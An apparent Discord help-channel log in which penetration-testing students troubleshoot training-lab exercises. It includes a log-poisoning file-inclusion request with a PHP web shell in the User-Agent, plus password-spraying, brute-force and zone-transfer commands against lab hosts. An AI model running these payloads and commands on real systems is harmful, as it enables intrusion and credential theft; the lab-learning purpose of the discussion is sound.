im trying to crack johanna password in passwords attacks lab hard but i never get it. what am i doing wrong?

So I'm trying to figure out WHY I am able to issue commands via an anonymous bind through rpcclient. I have a Windows 2016 VM spun up. On the VM I can NOT issue any commands; I get "result was NT_STATUS_ACCESS_DENIED". I already asked chatgpt and found a couple GPOs that may restrict commands over anonymous binds, but NONE of them are enabled or even configured on the VM. So my questions is: Does anyone know the exact GPO/setting on Windows Server 2016 that allows one to authenticate anonymously, but restricts issuing commands?

||```
GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=id HTTP/1.1

Host: 178.62.8.249:31685

User-Agent: '<?php system($_GET["cmd"]); ?>'

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

/ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log HTTP/1.1" 200 1710 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
178.62.8.249 - - [28/Feb/2023:02:04:23 +0000] "GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log HTTP/1.1" 200 1761 "-" "poison"
178.62.8.249 - - [28/Feb/2023:02:04:25 +0000] "GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log HTTP/1.1" 200 1761 "-" "poison"
178.62.8.249 - - [28/Feb/2023:02:04:33 +0000] "GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log HTTP/1.1" 200 1785 "-" "poison"
178.62.8.249 - - [28/Feb/2023:02:05:26 +0000] "GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=id HTTP/1.1" 200 1799 "-" "'

I get this... not sure what is going on i have tried many times other ways to do it.

Password Attack : Lab Medium
I just cracked the password using id_rsa. Whats next ? any hint

||"<?php system($_GET['cmd']); ?>"||

@simple zephyr

try using crackmapexec wirnm (and the most importan thing, --local-auth option)

with mut password

anyone know how to do the osticket part ?

i think it might be ||tt||

anyone did an update of crackmapexec and now start to receive errors?
args = gen_cli_args()

use the id_rsa password; move onto the next thing; the medium lab is a bit of bouncing between cracking and exploiting

aka what is the RSA usually for?

solved it. thanks

thanks got it, I also had one less ../

Can't seem to get the privesc to work on Windows Privilege Escalation Skills Assessment I found a CLSID but it's authing as the current user. Am I on the right path? NVM, I was using the wrong one the whole time haha.

tt

Hi Everyone, Need some assistance where am i missing > on file inclusion -LAST Q-skill assessment) As i hv tried multiple probabilites using PHP wrappers but no luck ...still getting blank page and not able to get php.ini (anyONE ON THE SAME PAGE/ISSUE?

has your problem been solved?

Hey, im stuck on Active Directory Assessment II. I’m stuck on this question: Use a common method to obtain weak credentials for another user.

can someone nudge me on "Escape" box..
got 2 credentials
1 works sql and 1 works on sql and windows both .. still no user flag and access...

Please who here knows how to dork

Hey can someone help me to grab the FTP server banner for FTP - Footprinting ?

is there something that you don't understand?

no, i ran ||nmap script to grab banner, nmap default script, command status in the ftp server, i got 220 InFreight FTP v1.1|| but this is not the flag i don't understand

The flag and the banner are two separate questions

sorry, i want to submit the banner for the first question, i already have the flag.txt

all I can say is that you have the banner

wtf

you only need to make the differentiation what the banner consists of

but it only asks to submit the entire banner, so i don't understand

yes, that is correct and you have it, but you also have something that is not part of the banner

ok thanks

try asking yourself if I have the banner, then what could be stopping me to submit it, do I have something extra how can I narrow it down and understand what that extra is and what it indicates

anyone available for help on the last hop of the pivoting skill assessment ?

anyone can help me with this one(What is the FQDN of the host where the last octet ends with "x.x.x.203"?) and yes i have bruteforced all the domains i found but every time i get this message: NS record query failed: REFUSED

ur right ! thanks a lot

hey i'm learning Navigation section in Linux Fundamental modules, but is this suppose to be the right answer?

Hello everyone, im stuck on Active Directory Assessment II. I’m stuck on this question: Use a common method to obtain weak credentials for another user.

hint ||password spraying ||

you are using the right command but you need to run it on the given target machine not the pwnbox

sure what's the issue?

not sure about brute forcing but i can complete this section by doing a ||dns zone transfer|| twice and that also review the ip for me

wdym by twice?

Hi

i just mean run it twice but the second time with a ||subdomain|| of course

can't find DC ip adress

oh you don't need to

i did with all the subdomains i found, it says "transfer failed"

only internal and the normal one can complete the transfer

I can be a teacher i'm profesional at this

the flag is on the third machine, there is a mounted share drive from the DC just go in file explorer and you will see it

yep you can do the zone transfer with only 1 subdomain

How can I be a teacher?

I used password spraying. I used kerbrute to find new users with jsmith.txt and crackmapexec

teacher on what subject

Hacking, Informatics...

dig axfr inlanefreight.htb @10.129.254.152

like this right

ok

yep but with a subdomain that (i think) is in the same zone

thx

Because I'm a cibersecurity teacher irl

nice

what are the differences between stdin stdout and stderr

stdin − It stands for standard input, and is used for taking text as an input. stdout − It stands for standard output, and is used to text output of any command you type in the terminal, and then that output is stored in the stdout stream. stderr − It stands for standard error

i forgot how the username thing work but i just give the tool a "weak" password

i also tried this one, it gave me some sub domains aswell but still not the good one (dig axfr internal.inlanefreight.htb @10.129.254.152)

okay, but where

yeah that's spoiler also that should be all of the subdomain you'll need for this section

Linux

stream standards

When you enter a command, if no file name is given, your keyboard is the standard input, sometimes denoted as stdin . When a command finishes, the results are displayed on your screen. Your screen is the standard output, sometimes denoted as stdout .

enter a command where

The I/O streams can be redirected by putting the n> operator in use, where n is the file descriptor number. For redirecting stdout, we use “1>” and for stderr, “2>” is added as an operator.

ye but none is .203

In the console ofc

I'm not sure what console is

https://www.tutorialspoint.com/understanding-stdin-stderr-and-stdout-in-linux#:~:text=stdin − It stands for standard,It stands for standard error. Look here , it explains it very well

what are the numbers in the url is that math?

oh wait sorry which module and section are you in?

No, In a URL, a hash mark, number sign, or pound sign ( # ) points a browser to a specific spot in a page or website. It is used to separate the URI of an object from a fragment identifier.

Footprinting, DNS and the last question

I understand for the weak password and use kerbrute (on Linux) but I found nothing interesting (I think I didn’t find good user

is it only that

oh i forgot, thanks for the help bro!

A URL can contain a number to identify to the website itself what data that URL should get from the database powering the site. The number corresponds to the ID of the category or post (or ecommerce item or... etc etc).

but the url you gave is not an ecommerce item

Yea that was an example

yep wrong module but for that dns zone transfer can also get you the subdomain just a bit more step and also a hint for that is you have to run the brute forcing tool on a subdomain not the main domain

alright

Thank you 🙂

no idea about that i do it on one of the windows machine

but why do we have those numbers and special characters

@vital adder when i do that i get: internal.inlanefreight.htb NS record query failed: REFUSED

HTML special characters are a series of codes that are used to translate the different characters used in human alphabets to display them in web browsers. This is because computers only use numbers and not letters or symbols.

yeah that is one of the 2 subdomain that will work but hint not that one

ok, feel free to help out and don't ask for money

alr

Okay thank you and I wont ask for money dw

I do it because I like my work

I love teaching others cibersecurty, my speciality

can you teach me how to hack??

Sure

what do u want to hack?

You want to learn from the beginnig?

nvm i learned, you are a great teacher

Okay and thank you

@vital adder i found it

thanks

@autumn pilot do I get a role? or what

nope

Okay

bagel machine?done?

any1?

hello guys. Can someone helpme out with active directory enum & attacks on section Password spraying - making a target user list

what exactly

im using kerbrute for the user enumeration

but something doesnt seem to work

Are you following the arguments in the example from the section?

yeah

and what is the error

DM ?

paste it here for future reference if someone else stumbles across the same issue

are you sure that this is the IP of the domain controller

I thought maybe the mistake was to use the wrong IP. Then did fping and found another IP. Testet it with the other one but same results

try to find a way to identify the domain controller

and a bonus question, how many NICs does the jumpbox has and why

Hey guys,
I'm in the Active Directory Enumeration & Attacks module, Internal Password Spraying - from Linux section.
||I made a valid users list with kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt | grep @in | cut -f8 -d" " > validusers.txt and i looks good when i cat it. Problem is that neither the bash one-liner, Kerbrute or CrackMapExec works. I got the answer for the section, but I just want to know what I'm doing wrong since I can't get any of the tools to work.

┌─[✗]─[htb-student@ea-attack01]─[~]
└──╼ $for u in $(cat validusers.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
┌─[✗]─[htb-student@ea-attack01]─[~]
└──╼ $kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 validusers.txt  Welcome1
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (9cfb81e) - 02/28/23 - Ronnie Flathers @ropnop

2023/02/28 07:09:28 >  Using KDC(s):
2023/02/28 07:09:28 >      172.16.5.5:88
2023/02/28 07:09:28 >  [!] adunn@inlanefreight.local:Welcome1 - [Root cause: KDC_Error] KDC_Error: AS Exchange Error: kerberos error response from KDC: KRB Error: (14) KDC_ERR_ETYPE_NOSUPP KDC has no support for encryption type
2023/02/28 07:09:29 >  Done! Tested 20 logins (0 successes) in 0.589 seconds
┌─[htb-student@ea-attack01]─[~]
└──╼ $sudo crackmapexec smb 172.16.5.5 -u validusers.txt -p Welcome1 | grep +
┌─[✗]─[htb-student@ea-attack01]─[~]
└──╼ $
```||

remove the grep that you are piping and check if the domain\username is appropriately appended

shot in the dark, but let's see

||```┌─[✗]─[htb-student@ea-attack01]─[~]
└──╼ $sudo crackmapexec smb 172.16.5.5 -u validusers.txt -p Welcome1
<SNIP>
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [-] INLANEFREIGHT.LOCAL\sgage@inlanefreight.local:Welcome1 STATUS_LOGON_FAILURE
<SNIP>

┌─[htb-student@ea-attack01]─[~]
└──╼ $for u in $(cat validusers.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5; done
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
<SNIP>

Wait... It cannot connect?!?

seems like it

maybe refresh the host again

try to ping the DC, or banner grab the smb

see if it responds and etc

Ping is fine

└──╼ $ping 172.16.5.5
PING 172.16.5.5 (172.16.5.5) 56(84) bytes of data.
64 bytes from 172.16.5.5: icmp_seq=1 ttl=128 time=0.454 ms
64 bytes from 172.16.5.5: icmp_seq=2 ttl=128 time=0.441 ms
64 bytes from 172.16.5.5: icmp_seq=3 ttl=128 time=0.534 ms```

Broken/unstable lab?

As long as i know I'm not the problem I'll be satisfied...

ping might be fine, but smb might not

└──╼ $smbclient -L 172.16.5.5
Enter WORKGROUP\htb-student's password: 
Anonymous login successful

    Sharename       Type      Comment
    ---------       ----      -------
SMB1 disabled -- no workgroup available

seems to be working, so the problem might be somewhere in the userlist

looks good yup

can you try with kerbrute's password spray

┌─[htb-student@ea-attack01]─[~]
└──╼ $kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 validusers.txt  Welcome1

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (9cfb81e) - 02/28/23 - Ronnie Flathers @ropnop

2023/02/28 07:39:27 >  Using KDC(s):
2023/02/28 07:39:27 >      172.16.5.5:88

2023/02/28 07:39:27 >  [!] adunn@inlanefreight.local:Welcome1 - [Root cause: KDC_Error] KDC_Error: AS Exchange Error: kerberos error response from KDC: KRB Error: (14) KDC_ERR_ETYPE_NOSUPP KDC has no support for encryption type
2023/02/28 07:39:27 >  Done! Tested 21 logins (0 successes) in 0.065 seconds

It doesn't even seem to try all 57 usernames

which command did you use before to create a list from the kerbrute ?

||kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt | grep @in | cut -f8 -d" " > validusers.txt||

give it a go with manually specifying a random username (entry from the userlist) and the password

maybe with a flag --user-as-pass ?

when i run kerbrute passwordspray command. I get errors ?

Exactly!

What is the problem?

you got a hit. I got nothing

i dont know

My hit was an error too

hmmmm

Broken lab?

i will text support

Awesome!

I need it to work with a list though...

i tried with crackmapexec

the list and the password

it didnt even gave a hit

Same here

Exactly...

Hum maybe i have the same problem with assessment skill 2 with kerbrute

Okay i texted the support now and bombed him with screenshots 😂

It works if you only have one username in your .txt file

😂

?

He'll check it he said

#modules message

I should wait

So in the module u have to use the parot box to locally connect to inline, but when ever i try to upload a war file to the tomcat, it excutes but my i dont get a shell connection and i have used msfvenom and the msfconsole itself. Then i tried it on the blue machine and the msfconsole said it was vuln but no session created ( i opened the shell in the webpage)

In the module shells

What section?

The last one with the parrot box

@uncut mirage @fathom mortar works for me

you can skip the whole enumeration from rpc and the oneliner and just use the jsmiths.txt file to grep for accounts starting with s , generating such a wordlist can be used with kerbrute

and of course with crackmapexec

but cme doesnt work for me neither

have you grepped the jsmith.txt list for usernames starting with S?

i'll try that way. I thought you mean normal txt with cme

Works for me too. Has to be without @inlanefreight.local

But still. Why does kerbrute only work with one entry in the file?

could it be due to formatting in the file

^how do you remove all @inlanefreight.com at once ?

so the tail command ?

nope just showcasing 5 entries of the users.txt to fit into the screenshot

oh

same goes for head

└──╼ $cat validusers.txt 
dpayne@inlanefreight.local
mhicks@inlanefreight.local
adunn@inlanefreight.local
lmatthews@inlanefreight.local
avazquez@inlanefreight.local
mlowe@inlanefreight.local
<SNIP>
sgage@inlanefreight.local
jshay@inlanefreight.local
jhermann@inlanefreight.local
whouse@inlanefreight.local
emercer@inlanefreight.local
wshepherd@inlanefreight.local
┌─[htb-student@ea-attack01]─[~]
└──╼ $cat validusers2.txt 
sgage@inlanefreight.local```
`validusers.txt` does not work, `validuser2.txt` does work. No difference in formatting as far as i can see?

what does the cut -d '@' -f1 stand for

https://explainshell.com/explain?cmd=cut+-d+'%40'+-f1

if you less one file at the time can you see something different?

No difference apart from the fact that validusers.txt contains 36 lines and validusers2.txt only contains one.

interesting

i did it now with the list only with users adn tried it with kerbrute. Still not working

@uncut mirage does it work for you ?

Yeah kerbrute is still not working for either of us

remove the ||@inlanefreight.local||

i did

CME needs to be without @inlanefreight.local

Kerbrute needs to be with

Great, looks like you got it working

only cme

kerbrute doesnt worjk

Yes, Kerbrute is still a bitch...

interesting behaviour of the tool

yeah

it automatically appends the "domain" (kerbrute), however, if you have a list that contains that domain it will throw an error

maybe it has to something with the way of how it treats the entries

so yeah, you definitely don't need the @inlanefreight.local part

it worked with kerbrute for the supportguy too

this is due to automatically appending the @domain at the username when a valid login is found, this is not the actual entry from the wordlist

And for find user weak credentials for an other user for Active Directory assessment skill II?

which feeds the illusion that the user wordlist is in the form of username@<DOMAIN.COM>

this is a bad question, but how can i get to the cybernetics prolab channel?

edit just verify again ig 🙂

I removed the domain and it still doesn't work for me with kerbrute...

└──╼ $cat validusers2.txt 
jjones
sbrown
<SNIP>
evalentin
sgage
jshay
jhermann
whouse
emercer
wshepherd
┌─[htb-student@ea-attack01]─[~]
└──╼ $kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 validusers2.txt  Welcome1

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (9cfb81e) - 02/28/23 - Ronnie Flathers @ropnop

2023/02/28 08:43:03 >  Using KDC(s):
2023/02/28 08:43:03 >      172.16.5.5:88

2023/02/28 08:43:03 >  [!] bdavis@inlanefreight.local:Welcome1 - [Root cause: KDC_Error] KDC_Error: AS Exchange Error: kerberos error response from KDC: KRB Error: (14) KDC_ERR_ETYPE_NOSUPP KDC has no support for encryption type
2023/02/28 08:43:03 >  [!] mmorgan@inlanefreight.local:Welcome1 - [Root cause: KDC_Error] KDC_Error: AS Exchange Error: kerberos error response from KDC: KRB Error: (14) KDC_ERR_ETYPE_NOSUPP KDC has no support for encryption type
2023/02/28 08:43:03 >  Done! Tested 21 logins (0 successes) in 0.085 seconds```

The bash one-liner and CME works though!

Yes, because kerbrute will append -d inlanefreight.local to the users, e.g. if the userlist contains only checkmate entry, then kerbrute will try checkmate@inlanefreight.local

at least for now this is my logic

hello everyone can someone help me with windows privesc skills assessment please ?

also let's remove any spoilers

If it appends then why would a list of usernames without the domain not work?

it works for me for some reason

But a singe entry without the domain would?

Would you mind trying this list with kerbrute:
kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt | grep @in | cut -f8 -d" " | cut -d '@' -f1 > validusers.txt

fails

hmm

Exactly WTF is wrong? On a real engagement that is how you would do it...

it is not even consistent, it will check for example 15 logins and on the next run 20

yeah

Yes, it makes no sense

one approach would be to remove users that trigger the kdc_error from the list and run it again

maybe thats stopping the tool from going further but that doesn't make sense

Ok yeah, if you remove the ones that trigger kdc_error it works... So, why is that error triggered?

it goes on. in the next section i try to connect via rdp. The only thing i get is a black screen 😂

Can we get support to try with kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt | grep @in | cut -f8 -d" " | cut -d '@' -f1 > validusers.txt? 😅

he already close my ticket

thats a good question that I'm trying to get the answer

my guess would it be due to the nature of how those accounts were created is triggering that error message, if you remove all of those user entries that trigger it kerbrute will proceed with the passwordspray

@uncut mirage can you connect to the host via rdp in the next section ?

Ok thanks. Guess that's just how it is, now i know what to do about it 👍

Doesn't seem like it... Just black screen...

Yeh for me too

click enter or click anywhere on the screen

oh yeah

thanks

anyone that knows how how to travel in the imap command line

becouse its turning me crazy and i dont know how to get the flag

can anyone help me out solve the second one on https://academy.hackthebox.com/module/115/section/1132

have you connected to the target?

Hi Everyone, Need some assistance where am i missing > on file inclusion -LAST Q-skill assessment) As i hv tried multiple probabilites using PHP wrappers but no luck ...still getting blank page and not able to get php.ini (anyONE ON THE SAME PAGE/ISSUE?

Fuzzing Module
ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.academy.htb/

Nothing gets displayed i don't know what am doing wrong..

Capitalize FUZZ

Also

It's telling you to do hackthebox.eu

yes yes, i fixed the url, still nothing

ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u https://FUZZ.hackthebox.eu/

Is your SecList in that directory?

yep, the scan runs ... but no output is there

ffuf -w wordlist -u domain -H "FUZZ.domain"

the only time yours will work on internal domains is if you have a dnsmasq setup

Thanks I knew there was something off

FUZZ: /opt/useful & not FUZZ: SPACE/opt/useful <<<hope it helps further (a little typo can waste much time) CHEERS 🙂

I just couldn't pin it

Hi

thank you guys!

Does someone need help?

Me

Okay what do you need

Ugh i can't upload the picture

However

dms

I am trying to run command scrcpy in kali linux

But it doesn't work

Show me what you are doing

I tried to download it using "sudo apt install scrcpy" but nothing except an err says Unable to locate package

I can't send a pic

I will dm u

Send me in dms

yes

?

english only

sorry bro

in Password Mutations from PASSWORD ATTACKS what rule did you used guys, I tried with the default custom rule downloaded from resources section and found nothing, i have another question in Network Services which wordlist did you use to brute force rdp, tried with resources wordlist and didnt find anything

once you have created a mutated wordlist using the rule and the provided wordlist have you tried to brute force the login of the mentioned user

utilizing this command or i need another parameter 'hydra -I -l sam -P mut_password.list -v ssh://10.129.160.184'

looks like you have a syntax issue

where is the issue?

my eyes are the issue

it is capital i and I thought it was lowercase L

dont worry I use glasses

to sum it up, the command looks good

thanks, hydra its giving me [VERBOSE] Disabled child 10 because of too many errors so gonna try with ncrack

im struggling at the last question of the first PtH (PasswordAttacks)

yeah the dc01 is wonky

and it doesn't work straight out of the box

ah great

something that came to my mind, that you can try is to use ligolo or other tool that will create the tunnel that you can utilize with evil-wirnm and the -H option for login using the hash

might not work, but worth the try

i swear man the password attacks is breaking me

its not hard but its cost just a lot of patience

hello i am having difficulty with one of the modules was wondering if i could get help here

just post your question and someone's likely to help

your output has a flag visible.. maybe spoiler it

and i'm not sure what question you're trying to answer from what module

After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer.

the flag wasn't an answer to anything as far as i know

this is from the nmap module?

yep

if this is the medium skills assessment, the way i arrived at the answer is not how it was intended to be found

i tried looking at the scripts that nmap has

none of them gave me an answer tho

-sV just doesn't return anything for port 53

i think for this one you have to understand how DNS works

do you know how DNS questions and answers are sent?

the flag is literally in the output that you gave

it's asking for the version

not a flag

i thought he said that it didn't work

ah

which module is that and section

i will say no cause i amm not sure about your question

NETWORK ENUMERATION WITH NMAP

Firewall and IDS/IPS Evasion - Medium Lab

actually

i was copy pasting the flag and it had an extra space

lol

all good now

thank you for the help Xd

just had a look at the section..

and that was the flag

the way its worded is weird thought

it makes sense though

you did a version scan and it gave you the version

well since it was asking for a version i was looking for x.xx.xx kinda format

yea...

thank you for the help tho

A error is coming there is writen that u free users only allow 1 pwnbox

yup

what u mean by yup say me how to fix it

don't be a free user

hehe

how much they need

check the billing page

ok,but live in india i have rupi how i will give $

I have no idea, sorry

i think it automagically converts it to $?

a service i use takes payment in yen but since i live in the US it converts my $ to yen

Hi,
Anyone have a hint for Credential Hunting in Linux in passwords attacks module ?
I'm conneted in ssh
I used all the technics in the course but we can't download anything.
There is no python
In the history we find a trace about firefox decrypt but i can't download it on the host.

the firefox decrypt is already on the machine

I believe if my memory serves me correctly

Thanks for your reply !

I don't see it on the machine and in the bash history we can see that it is deleted.

In addition on the machine there is no python and I can not download anything on this machine it has no access to the internet
Even opening a web server on my local machine does not allow me to download files

module: Password Attacks

section: Protected Archives

I'm having trouble with the challenge on this one. Had no trouble cracking SSH keys but I can't seem to get any of the three wordlists (password.list, mutated.list, rockyou.txt) to work cracking these .zip archives

Can I master cybersec only with hack the box

Hint: kira

?

I meant about self studying

Master is a strong word, you can get good at it

But mastering is a different thing

Mmm yes

I just don't have money to spend for a uni degree

So I'm just thinking about self study just wanna make shure

There must be python maybe in another version (1.x, 2.x, 3.x)
Or specify the version in the terminal

HI there srry if it's the wrong channel cause there is no general does anyone knows about cracking here ?

when I make the command which python it returns me nothing.
And even if there was python firefox_decrypt is no longer on the machine and even with a local server from my machine I can not upload the script on the target.
I don't know what can i do

Oh yes i find python
I need to find how upload firefox_decrypt

So i'm stupid now it's ok with a local server ....

I have restart the target perhaps there was a problem

^^

Hi

I feel a little silly asking this, but how do you go about resetting bloodhound? Like between engagements?

pretty sure you gotta clear the neo4j db. Best way to do so idk.

maybe this button can help you

Just came here to celebrate... My fist hack! 🥳 Love the course answer!

This pen testing course is really interesting! It keeps me going for more!

module: footprinting section: footprinting lab-easy. I want to confirm something. When you ftp to the site, does it look like this to you? . I am trying to figure out if it is my firewall blocking the return data or is something else. I did try to start an instance of the online workstation, but it just hangs waiting for the instance to start. My roommate was messing out with the firewall during the weekend, I am not sure if he installed a new one or just played around with the settings trying to harden it.

well I dont remember. but from my notes, it looks like I played around wget

thanks, I'll try playing around with 'wget', but I still think I am having issues with the firewall blocking me.

im on the medium box of footprinting module. I mounted the NFS share and created a custom group mimicking the group id of the mounted file, I named it hopefully. I assigned the group to a user I created, but when I try to go inside the folder it wont let me. So I use sudo, but the passwd I set for the user doesn't work. Here's some information:
||```
$ ls -l
Total 64
drwx------ 2 nobody hopefully 65536 Nov 11 2021 TechSupport
$ sudo cd TechSupport/
[sudo] password for testest:
testest is not in the sudoers file. This incident will be reported.

Hey people, just having an issue on one of the academy modules, i'm on the INTRO TO CMD modfule on "Finding files and directories"